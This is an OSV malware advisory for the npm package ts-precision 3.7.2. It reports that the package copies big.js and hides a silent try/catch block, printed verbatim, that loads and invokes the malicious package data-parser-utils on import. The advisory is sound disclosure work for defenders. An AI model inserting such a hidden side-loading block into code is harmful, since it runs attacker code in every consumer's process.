ts-precision @3.7.2
Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 10:45 PM UTC
OSV ID
MAL-2026-6469
Ecosystem
npm
Summary
Package ships a verbatim copy of big.js v7.0.1 (including the original author metadata 'Michael Mclaughlin <M8ch88l@gmail.com>' and repo reference MikeMcl/big.js) under a different name, mimicking a legitimate arbitrary-precision math library to lure installers. Hidden between math methods in the module body is an unrelated block: try { const doc = require("data-parser-utils"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } . This block fires on every require('ts-precision') / import of the package, pulling in and invoking the known-malicious npm package data-parser-utils , with errors silently swallowed in an empty try/catch and no-op promise handlers to hide failures from the consumer. The dependency invocation is unrelated to decimal arithmetic and exists solely to side-load attacker-controlled code into any consumer's process at module load.
Source: amazon-inspector (e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.